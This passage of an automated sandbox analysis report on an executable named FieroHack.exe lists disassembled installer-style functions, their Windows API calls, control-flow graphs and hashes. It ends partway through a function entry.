                                                    control_flow_graph 477 4015bb-4015ce call 402bce call 405b28 482 4015d0-4015e3 call 405aba 477->482 483 401624-401627 477->483 491 4015e5-4015e8 482->491 492 4015fb-4015fc call 405761 482->492 485 401652-4022e2 call 401423 483->485 486 401629-401644 call 401423 call 4060f7 SetCurrentDirectoryA 483->486 499 402a5a-402a69 485->499 486->499 502 40164a-40164d 486->502 491->492 496 4015ea-4015f1 call 40577e 491->496 498 401601-401603 492->498 496->492 507 4015f3-4015f9 call 4056e4 496->507 504 401605-40160a 498->504 505 40161a-401622 498->505 502->499 509 401617 504->509 510 40160c-401615 GetFileAttributesA 504->510 505->482 505->483 507->498 509->505 510->505 510->509
                                                    APIs
                                                      • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                      • Part of subcall function 004056E4: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming,00000000,00000000,000000F0), ref: 0040163C
                                                    Strings
                                                    • C:\Users\user\AppData\Roaming, xrefs: 00401631
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                    • String ID: C:\Users\user\AppData\Roaming
                                                    • API String ID: 1892508949-159752144
                                                    • Opcode ID: 8ea1f7cc9a8bf7522c8949f70cf2fb79c547dd436f64854b827cbeb5bc810ff8
                                                    • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                    • Opcode Fuzzy Hash: 8ea1f7cc9a8bf7522c8949f70cf2fb79c547dd436f64854b827cbeb5bc810ff8
                                                    • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                    Function 00405796 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 513 405796-4057c7 CreateProcessA 514 4057d5-4057d6 513->514 515 4057c9-4057d2 CloseHandle 513->515 515->514
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                    • CloseHandle.KERNEL32(?), ref: 004057CC
                                                    Strings
                                                    • Error launching installer, xrefs: 004057A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateHandleProcess
                                                    • String ID: Error launching installer
                                                    • API String ID: 3712363035-66219284
                                                    • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                    • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                    • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                    • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 516 401389-40138e 517 4013fa-4013fc 516->517 518 401390-4013a0 517->518 519 4013fe 517->519 518->519 521 4013a2-4013a3 call 401434 518->521 520 401400-401401 519->520 523 4013a8-4013ad 521->523 524 401404-401409 523->524 525 4013af-4013b7 call 40136d 523->525 524->520 528 4013b9-4013bb 525->528 529 4013bd-4013c2 525->529 530 4013c4-4013c9 528->530 529->530 530->517 531 4013cb-4013f4 MulDiv SendMessageA 530->531 531->517
                                                    APIs
                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                    • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                    • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                    • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                    Function 00406500 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 532 406500-40651a GetModuleHandleA 533 406526-406533 GetProcAddress 532->533 534 40651c-40651d call 406492 532->534 536 406537-406539 533->536 537 406522-406524 534->537 537->533 538 406535 537->538 538->536
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                      • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                      • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                      • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                    • String ID:
                                                    • API String ID: 2547128583-0
                                                    • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                    • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                    • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                    • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                    Function 00405C90 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 539 405c90-405cbc GetFileAttributesA CreateFileA
                                                    APIs
                                                    • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\FieroHack.exe,80000000,00000003), ref: 00405C94
                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesCreate
                                                    • String ID:
                                                    • API String ID: 415043291-0
                                                    • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                    • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                    • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                    • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                    Function 00405C6B Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 540 405c6b-405c7b GetFileAttributesA 541 405c8a-405c8d 540->541 542 405c7d-405c84 SetFileAttributesA 540->542 542->541
                                                    APIs
                                                    • GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                    • Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
                                                    • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                    • Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98
                                                    Function 00405761 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 543 405761-40576f CreateDirectoryA 544 405771-405773 543->544 545 405775 GetLastError 543->545 546 40577b 544->546 545->546
                                                    APIs
                                                    • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                    • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLast
                                                    • String ID:
                                                    • API String ID: 1375471231-0
                                                    • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                    • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                    • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                    • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                    Function 00405D08 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                    • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                    • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                    • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                    Function 00405D37 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                    • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                    • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                    Function 00403300 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                    • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                    • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                    • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                    Function 00401F7B Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                      • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,004257BA,74DF23A0), ref: 0040527A
                                                      • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                      • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                      • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                      • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                      • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                      • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                    • String ID:
                                                    • API String ID: 2972824698-0
                                                    • Opcode ID: baec25d5bd2dfe6d55721a489fba1732094f7a4d61ef90c6e2c4752007c8309d
                                                    • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                    • Opcode Fuzzy Hash: baec25d5bd2dfe6d55721a489fba1732094f7a4d61ef90c6e2c4752007c8309d
                                                    • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                    Function 00403830 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 83a8e34a36ec992e53eb10e28b6b1173665ca16798591da3225f5f7867e87012
                                                    • Instruction ID: 504de9a345f4e041b5d785333e0db00fbf57b3530eebac313f647de5124f4253
                                                    • Opcode Fuzzy Hash: 83a8e34a36ec992e53eb10e28b6b1173665ca16798591da3225f5f7867e87012
                                                    • Instruction Fuzzy Hash: D3C01231540704B6D1247F759D4F9093A58AB45736B608775B0F5B00F1D73C8669456D

                                                    Non-executed Functions

                                                    Function 0040535C Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                    • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                    • GetClientRect.USER32(?,?), ref: 00405407
                                                    • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                    • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                    • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                    • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                    • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                    • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                    • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                      • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                    • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                    • ShowWindow.USER32(00000000), ref: 00405554
                                                    • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                    • ShowWindow.USER32(00000008), ref: 004055A1
                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                    • CreatePopupMenu.USER32 ref: 004055E6
                                                    • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055FB
                                                    • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                    • OpenClipboard.USER32(00000000), ref: 00405680
                                                    • EmptyClipboard.USER32 ref: 00405686
                                                    • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                    • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                    • SetClipboardData.USER32(00000001,00000000), ref: 004056D1
                                                    • CloseClipboard.USER32 ref: 004056D7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
